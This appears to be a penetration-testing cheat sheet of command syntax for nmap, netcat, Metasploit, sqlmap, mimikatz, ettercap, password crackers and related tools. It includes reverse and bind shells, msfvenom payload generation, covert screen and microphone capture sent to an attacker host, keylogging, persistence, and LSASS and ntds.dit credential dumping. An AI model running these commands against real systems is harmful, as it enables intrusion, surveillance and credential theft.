Tool Syntax

How to use the tools

Nmap command

Scanning methods

Switch            Explanation
-sP               Ping scan (host discovery only)
-sS               SYN scan
-sT               TCP connect scan
-sU               UDP scan
-sO               IP protocol scan
-sV               Service version detection
-sC               Run the default NSE scripts
-T4               Timing template; speed from 0 (slowest) to 5 (fastest)
-oA               Write output in all formats
-iL list.txt      Scan the hosts listed in list.txt

Capabilities

Switch                Explanation
-oX file              Write output to file as XML
-oG file              Write output to file in grepable format
-oA file              Save output in all 3 formats
-iL file              Read the target hosts from file
--excludefile file    Skip the hosts listed in file

Advanced features

Switch                            Explanation
-sV -p <port> --script=banner     Grab service banners
--traceroute                      Trace the route to each host
--ttl <value>                     Set the IP time-to-live of sent packets
--script <name>                   Run the named NSE script

Firewall evasion

Switch                    Explanation
-f                        Fragment packets
-S ip                     Spoof the source address
-g #                      Spoof the source port
-D ip,ip                  Use decoy addresses
--mtu #                   Set the MTU size
--spoof-mac mac           Spoof the MAC address
--data-length size        Append random data of the given size to each packet
--scan-delay <time>       Wait the given time between probes
--min-rate=X              Send at least X packets per second

Convert xml output to html

xsltproc nmap.xml -o nmap.html

Build a list of live hosts

# grep on "Nmap scan report" so the "Starting Nmap" and "Nmap done" lines do not pollute the list
nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24 | grep "Nmap scan report" | cut -d " " -f 5 > live_hosts.txt

Compare nmap results

ndiff scan1.xml scan2.xml
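
Parsing the XML written by -oX is more robust than grepping the normal output. The following is an added example (not code from the original page or from the nmap project) that extracts live hosts and open ports from nmap XML and compares two scans for appeared and vanished hosts, the way ndiff does; the sample XML is constructed for the demo.

```python
import xml.etree.ElementTree as ET

# Constructed sample of "nmap -oX" output (not a real scan result).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -oX out.xml 192.0.2.0/29">
  <host><status state="up"/><address addr="192.0.2.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="192.0.2.2" addrtype="ipv4"/></host>
  <host><status state="up"/><address addr="192.0.2.3" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443"><state state="closed"/></port>
    </ports>
  </host>
</nmaprun>
"""


def _up_hosts(root):
    """Yield (IPv4 address, host element) for every host nmap reported as up."""
    for host in root.findall("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is not None and addr is not None and status.get("state") == "up":
            yield addr.get("addr"), host


def live_hosts(xml_text):
    """Return the addresses of live hosts, in document order."""
    return [addr for addr, _ in _up_hosts(ET.fromstring(xml_text))]


def open_ports(xml_text):
    """Map each live host to its open ports as 'port/proto' strings."""
    result = {}
    for addr, host in _up_hosts(ET.fromstring(xml_text)):
        result[addr] = [
            f"{p.get('portid')}/{p.get('protocol')}"
            for p in host.findall("ports/port")
            if p.find("state") is not None and p.find("state").get("state") == "open"
        ]
    return result


def diff_hosts(old_xml, new_xml):
    """Like ndiff for host status: (hosts that appeared, hosts that vanished)."""
    old, new = set(live_hosts(old_xml)), set(live_hosts(new_xml))
    return sorted(new - old), sorted(old - new)


if __name__ == "__main__":
    print(live_hosts(SAMPLE_NMAP_XML))
    print(open_ports(SAMPLE_NMAP_XML))
```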

Reverse DNS lookup of an IP range

nmap -R -sL --dns-servers server 1.1.1.0/24

IDS test (Xmas scan with decoy IPs and source spoofing)

for x in {1..10000}; do nmap -T5 -sX -S spoof-source-IP -D <comma-separated-decoy-IPs> --spoof-mac aa:bb:cc:dd:ee:ff -e eth0 -Pn targeted-IP; done

List of nmap scripts

Script                   Explanation
smb-enum-shares.nse      List SMB shares

Wireshark software

Filter                                            Explanation
eth.addr / eth.dst / eth.src                      MAC address
rip.auth.passwd                                   RIP password
ip.addr / ip.dst / ip.src (ipv6.* for IPv6)       IP address
tcp.port / tcp.dstport / tcp.srcport              TCP ports
tcp.flags (ack, fin, push, reset, syn, urg)       TCP flags
udp.port / udp.dstport / udp.srcport              UDP ports
http.authbasic                                    HTTP basic authentication
http.www_authenticate                             HTTP WWW-Authenticate header
http.data                                         HTTP data
http.cookie                                       HTTP cookies
http.referer                                      HTTP referer
http.server                                       HTTP server header
http.user_agent                                   HTTP User-Agent header
wlan.fc.type eq 0                                 802.11 management frames
wlan.fc.type eq 1                                 802.11 control frames
wlan.fc.type eq 2                                 802.11 data frames
wlan.fc.type_subtype eq 0 (1 = response)          802.11 association request
wlan.fc.type_subtype eq 2 (3 = response)          802.11 reassociation request
wlan.fc.type_subtype eq 4 (5 = response)          802.11 probe request
wlan.fc.type_subtype eq 8                         802.11 beacon
wlan.fc.type_subtype eq 10                        802.11 disassociate
wlan.fc.type_subtype eq 11 (12 = deauthenticate)  802.11 authentication

Comparison operators

eq or ==
ne or !=
gt or >
lt or <
ge or >=
le or <=

Logical operators

and or &&
or  or ||
xor or ^^
not or !

Netcat command

Fundamentals

Connect to a listener on [TargetIP] at [port]:
$ nc [TargetIP] [port]

Start a listener:
$ nc -l -p [port]

Start an HTTP proxy with ncat on the automation server

./ncat -l 3128 --proxy-type http &

Scan ports

TCP port scan of the range [startPort] to [endPort]:
$ nc -v -n -z -w1 [TargetIP] [startPort]-[endPort]

Transfer files

Send a file (to a receiver listening on port 1234):
nc.exe 10.10.10.10 1234 < file.log

Receive a file:
nc -vnlp 1234 > file.txt

Grab a [filename] from a listener:
1. Start a listener that pushes [filename]
$ nc -l -p [port] < [filename]
2. Connect to [TargetIP] and retrieve [filename]
$ nc -w3 [TargetIP] [port] > [filename]

Push a [filename] to a listener:
1. Start a listener that pulls [filename]
$ nc -l -p [port] > [filename]
2. Connect to [TargetIP] and push [filename]
$ nc -w3 [TargetIP] [port] < [filename]

Backdoor shells

Linux shell:
$ nc -l -p [port] -e /bin/bash
Linux reverse shell:
$ nc [LocalIP] [port] -e /bin/bash
Windows shell:
$ nc -l -p [port] -e cmd.exe
Windows reverse shell:
$ nc [LocalIP] [port] -e cmd.exe

Use VLC for streaming

Use cvlc (command-line VLC) on the target to avoid pop-ups

Capture and stream the screen over UDP to the attacker's address on port 1234

# Start a listener on the attacker machine
vlc udp://@:1234

-- OR --

# Start a listener that stores the stream in a file
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=test.mp4} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

# This may make the user's screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:udp{dst=attackerip:1234} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Capture and stream the screen over HTTP

# Start a listener on the attacker machine
vlc http://server.example.org:8080

-- OR --

# Start a listener that stores the stream to a file
vlc http://server.example.org:8080 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=test.mp4}

# Start streaming on the target machine
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:http{mux=ffmpeg{mux=flv},dst=:8080/} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Capture and stream the screen to a multicast address

# Start a listener on the attacker machine for multicast
vlc udp://@multicastaddr:1234

# Broadcast the stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:udp{dst=multicastaddr:1234} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Capture and record the screen to a file

vlc screen:// :screen-fps=25 :screen-caching=100 :sout=#transcode{vcodec=h264,vb=0,scale=0,acodec=mp4a,ab=128,channels=2,samplerate=44100}:file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4} :no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep

Record and stream microphone on udp

vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device"

SSH command

/etc/ssh/ssh_known_hosts   # System-wide known hosts
~/.ssh/known_hosts         # Hosts the user has logged into
sshd-generate              # Generate SSH host keys (DSA/RSA)
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key   # Generate SSH DSA keys
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key   # Generate SSH RSA keys

If already in an ssh session, press ~C (the ssh escape sequence) to configure a tunnel.
Port forwarding must be allowed on the target:
/etc/ssh/sshd_config - AllowTcpForwarding yes

Connect with ssh with specific port

ssh [email protected] -p 8222

Reverse port forwarding through the tunnel (from the support user's reverse shell)

ssh -R 4446:127.0.0.1:3128 [email protected]
http 127.0.0.1 4446

Forward X11 from the victim to the attacker

xhost +
vi ~/.ssh/config   # ensure 'ForwardX11 yes'

Create a port forward on port 8080 that is forwarded to port 443 on the attacker

ssh -R8080:127.0.0.1:443 [email protected]

Local port forward on the attacker's port 8080, sending traffic through the ssh tunnel to 3.3.3.3 port 3300

ssh -L8080:3.3.3.3:443 [email protected]

Dynamic tunnel using proxychains; set the port (1080) in /etc/proxychains.conf

In a separate terminal run:
proxychains nmap -sT -p80,443 3.3.3.3

Create multi-hop ssh tunnel

ssh -L 8888:127.0.0.1:8444 50mctf@MY_VPS
ssh -v -o PubkeyAuthentication=no -o PreferredAuthentications=password -o GatewayPorts=yes -fN -R *:8444:172.28.0.3:80 50mctf@MY_VPS

Metasploit software

Command                                          Description
msfconsole -r file.rc                            Load a resource file
msfcli | grep exploit/windows                    List Windows exploits
msfencode -l                                     List encoders
msfpayload -h                                    List payloads
show exploits                                    Display exploits
show auxiliary                                   Display auxiliary modules
show payloads                                    Display payloads
search string                                    Search for a specific string
search exploit string                            Search exploits
searchsploit -m exploits/php/webapps/45161.py    Copy the exploit file into the current directory
info module                                      Display module information
use module                                       Load an exploit or module
show options                                     Display module options
show advanced                                    Show advanced settings
set option value                                 Set an option value
sessions -v                                      List sessions (-k # kill, -u # upgrade to Meterpreter)
sessions -s script                               Run a Meterpreter script in all sessions
jobs -l                                          List all jobs (-k # kill)
exploit -j                                       Run the exploit as a job
route add ip netmask sid                         Pivoting
loadpath /home/modules                           Load a third-party module tree
irb                                              Ruby shell
connect -s ip 443                                Connect over SSL (netcat clone)
route add ip mask session_id                     Add a route through the pivot
exploit/multi/handler with set ExitOnSession false   Keep the handler listening for more shells
set ConsoleLogging true (also SessionLogging)    Enable logging

Sqlmap command

Send a GET request

sqlmap.py -u "http://url?id=1&str=val"

Send a POST request

sqlmap.py -u "http://url" --data="id=1&str=val"

SQL injection on a specific parameter when the database type is known

sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" -b --dbms="mssql|mysql|oracle|postgres"

SQL injection on a page that requires authentication

1. Log in and note the cookie values (cookie1=val1, cookie2=val2)
sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" --cookie="cookie1=val1;cookie2=val2"

SQL injection and retrieving the database banner, current database and current user

./sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" -b --current-db --current-user

SQL injection and listing the tables of database testdb

sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" --tables -D "testdb"

SQL injection and listing the columns of a table

sqlmap.py -u "http://url" --data="id=1&str=val" -p "id" --columns -T "users"

Read the request from a file

sqlmap.py -r req.txt

Dump the records of the specified table from the specified database

sqlmap -r req -D openemr -T users_secure --dump

Using the time-based (delay) technique

sqlmap -r req --technique=T

Bypass a WAF with unicode escaping

sqlmap -r json --tamper=charunicodeescape --dump --level=5 --risk=3 --dbs --columns

msf

Creating a meterpreter payload (for Linux: -t file -o callback)

./msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port R | ./msfencode -t exe -o callback.exe -e x86/shikata_ga_nai -c 5

Creating a payload with bind meterpreter

./msfpayload windows/meterpreter/bind_tcp RHOST=ip LPORT=port X > cb.exe

Creating a Java reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=9999 -f WAR > exploit.war

Creating a reverse shell for Windows with msfvenom

msfvenom -p windows/shell_reverse_tcp lhost=ip lport=port -f exe --platform windows >reverse.exe

Generate encoded payload using msfvenom

./msfvenom --payload windows/meterpreter/reverse_tcp --format exe --template calc.exe -k --encoder x86/shikata_ga_nai -i 5 LHOST=1.1.1.1 LPORT=443 > callback.exe

Start the msf database (bt5 = mysql, kali = postgresql)

/etc/rc.d/rc.mysqld start
msf> db_create root:pass@localhost/metasploit
msf> load db_mysql
msf> db_connect root:pass@localhost/metasploit
msf> db_import nmap.xml

--- Kali ---
# service postgresql start
# service metasploit start

Inject a shell back (by default it starts notepad and injects into it)

msf> use post/windows/manage/multi_meterpreter_inject
msf> set IPLIST attack_ip
msf> set LPORT callback_port
msf> set PIDLIST PID_to_inject   # default creates a new notepad
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set SESSION meterpreter_session_ID

Display the HTTP banners of the internal network

msf> route add ip/range netmask meterpreter_ID
msf> use post/multi/gather/ping_sweep          # Set options and run
msf> use auxiliary/scanner/portscan/tcp        # Set options and run
msf> hosts -u -S x.x.x -R                      # Searches for x.x.x.* and sets RHOSTS
msf> use auxiliary/scanner/http/http_version   # Set options and run
msf> services -v -p 80 -S x.x.x -R             # Displays IPs x.x.x.* with port 80 open

Meterpreter

Command                                                  Explanation
help                                                     List available commands
sysinfo                                                  Display system information
ps                                                       List processes
getpid                                                   Show the current process ID
upload file C:\Program Files\                            Upload a file
download file                                            Download a file
reg command                                              Interact with the registry
rev2self                                                 Revert to the original user
shell                                                    Drop into an interactive shell
migrate PID                                              Migrate to another process
background                                               Send the current session to the background
keyscan_start | keyscan_stop | keyscan_dump              Start/stop/dump the keylogger
execute -f cmd.exe -i                                    Run cmd.exe and interact with it
execute -f cmd.exe -i -H -t                              Run cmd.exe as a hidden process with all tokens
hashdump                                                 Dump all local hashes
run script                                               Run a script (scripts/meterpreter)
portfwd [add|delete] -L 127.0.0.1 -l 443 -r 3.3.3.3 -p 3389   Forward local port 443 through the current session to remote desktop (3389) on 3.3.3.3

Privilege escalation

use priv
getsystem

Impersonating a token (dropping the token stops the impersonation)

use incognito
list_tokens -u
impersonate_token domain\\user

Using nmap through a meterpreter socks proxy

1. msf> sessions                  # Note the Meterpreter ID
2. msf> route add 3.3.3.0 255.255.255.0 id
3. msf> use auxiliary/server/socks4a
4. msf> run
5. Open a new shell and edit /etc/proxychains.conf
   i.   #proxy_dns
   ii.  #socks4 127.0.0.1 9050
   iii. socks4 1.1.1.1 1080
6. Save and close the conf file
7. proxychains nmap -sT -Pn -p80,135,445 3.3.3.3

meterpreter> irb
client.railgun.user32.MessageBoxA(0,"got","YOU","MB_OK")

Creating a persistent Windows service

msf> use post/windows/manage/persistence
msf> set LHOST attack_ip
msf> set LPORT callback_port
msf> set PAYLOAD_TYPE TCP|HTTP|HTTPS
msf> set REXENAME filename
msf> set SESSION meterpreter_session_id
msf> set STARTUP SERVICE
meterpreter> run post/windows/gather/dumplinks

Create a new process and write the directory tree of C:\ to a file

execute -H -f cmd.exe -a '/c tree /F /A c:\ > C:\temp\tree.txt'

Ettercap software

Man-in-the-middle attack using filters

ettercap.exe -i iface -M arp -Tq -F file.ef MACs/IPs/Ports MACs/IPs/Ports
# e.g. // 80,443 // = any MAC, any IP, ports 80,443

Man-in-the-middle attack on the subnet with a compiled filter

ettercap -T -M arp -F filter // //

Switch flood attack

ettercap -TP rand_flood

Ettercap filters

Compile ettercap filters

etterfilter filter.filter -o out.ef

Example filter: drop VPN (IKE) traffic and strip the Accept-Encoding header so HTTP responses arrive uncompressed

if (ip.proto == UDP && udp.dst == 500) {
    drop();
    kill();
}
if (ip.src == 'ip') {
    if (tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Rubbish!");
            msg("Replaced Encoding\n");
        }
    }
}

Mimikatz command

1. Upload mimikatz.exe and sekurlsa.dll to the target
2. Run mimikatz
3. mimikatz# privilege::debug
4. mimikatz# inject::process lsass.exe sekurlsa.dll
5. mimikatz# @getLogonPasswords
6. sekurlsa::minidump /users/redteam/Desktop/lsass.DMP
7. sekurlsa::logonPasswords
Or
mimikatz# sekurlsa::tickets /export
mimikatz# kerberos::ptt <TICKET PATH>
Or
# cleartext passwords and hashes
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"

Hping3 command

hping3 targetIP --flood --frag --spoof ip --destport # --syn

Arping command

./arping -I eth# -a # arps

Wine command

cd /root/.wine/drive_c/MinGW/bin
wine gcc -o file.exe /tmp/code.c
wine file.exe

Grub software

GRUB menu: add 'single' to the end of the kernel line. Boot. Change the root password. Reboot.

Hydra command

hydra -l ftp -P words -v targetIP ftp

hashcat software

NTLMv2 crack

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force

John the Ripper software

Crack with a word list

$ ./john -wordfile:pw.lst -format:<format> hash.txt

Sample formats

$ john --format=des username:SDbsuge8iC58A
$ john --format=lm username:$LM$a9c604d244c4e99d
$ john --format=md5 $1$12345678$aiccj83HRD8o6ux1bVx7D1

$ john --format=raw-sha1 A9993E364706816ABA3E25717850C26C9CD0D89D

# For --format=netlmv2 replace $NETLM with $NETLMv2
$ john --format=netlm
$NETLM$1122334455667788$0836F0858124F33895875F81951905DD2F85252CC7318825
username:$NETLM$1122334455667788$0836F0858124F33895875F81951905DD2F85252CC7318825
username:$NETLM$1122334455667788$0836F0858124F33895875F81951905DD2F85252CC7318825:::::::

# Exactly 36 spaces between USER and HASH (SAPB and SAPG)
$ john --format=sapb
ROOT                                    $8366A4E9E6872C80
username:ROOT                                    $8366A4E9E6872C80

$ john --format=sapg
ROOT                                    $1194E38F1489F3F8DA18181F14DE870E78DCC239
username:ROOT                                    $1194E38F1489F3F8DA18181F14DE870E78DCC239

$ john --format=sha1-gen
$SHA1p$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789
username:$SHA1p$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789

$ john --format=zip
$zip$*0*1*8005b1b7d077708d*dee4
username:$zip$*0*1*8005b1b7d077708d*dee4

List of passwords

Creating different words from one base word

# Append lower(@), upper(,), number(%) and symbol(^) to the end of the word
crunch 12 12 -t baseword@,%^ -o wordlist.txt

# Use a custom special-character set, then add 2 digits followed by one special character
maskprocessor --custom-charset1='!@#$' baseword?d?d?1 -o wordlist.txt

# Generate a wordlist from a website, including numbers
cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

vssown command

1. Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
2. Create a new shadow copy
   a. cscript vssown.vbs /start (optional)
   b. cscript vssown.vbs /create
3. Pull the following files from a shadow copy:
   a. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
   b. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\System32\config\SYSTEM .
   c. copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
4. Copy the files to the attack box.
5. Download tools: http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
6. Configure and build libesedb from the extracted package
   a. cd libesedb
   b. chmod +x configure
   c. ./configure && make
7. Use esedbdumphash to extract the data table from ntds.dit
   a. cd esedbtools
   b. ./esedbdumphash ../../ntds.dit

File hashes

Hash lengths

Algorithm    Length
MD5          16 bytes
SHA-1        20 bytes
SHA-256      32 bytes
SHA-512      64 bytes

Online file-hash lookup databases

http://isc.sans.edu/tools/hashsearch.html
# dig +short <md5>.md5.dshield.org TXT
Result = "filename | source", e.g. "cmd.exe | NIST"

Malware hash database

http://www.team-cymru.org/Services/MHR
# dig +short <MD5|SHA-1>.malware.hash.cymru.com TXT
Result = last-seen timestamp and AV detection rate
Convert the timestamp: perl -e 'print scalar localtime(timestamp), "\n"'

Search in metadata files

https://fileadvisor.bit9.com/services/search.aspx

Search the virustotal database

https://www.virustotal.com/#search

Guess the password of the zip file

fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt secret.zip

Guess the password of the winrm service

crackmapexec winrm <IPS> -u <USERS> -p <PASSWORDS>

Guess the password of the smb service

crackmapexec smb <IP> -u <USER> -p <PASS> --shares

Connect to MSSQL with Impacket

mssqlclient.py -port 1433 [email protected]

PowerShell file download

powershell iwr -UseBasicParsing http://192.168.2.2/mimikatz.exe -OutFile mimikatz.exe

List of pods

kubectl get pod

Check whether you have rights to exec into any pods

./kubectl auth can-i exec pods

Exec into sensitive-pod

./kubectl exec -it sensitive-pod /bin/bash

More information about the environment

kubectl get nodes -o wide

RouterSploit

Discover Devices

python rsf.py -m discovery

Scan for vulnerabilities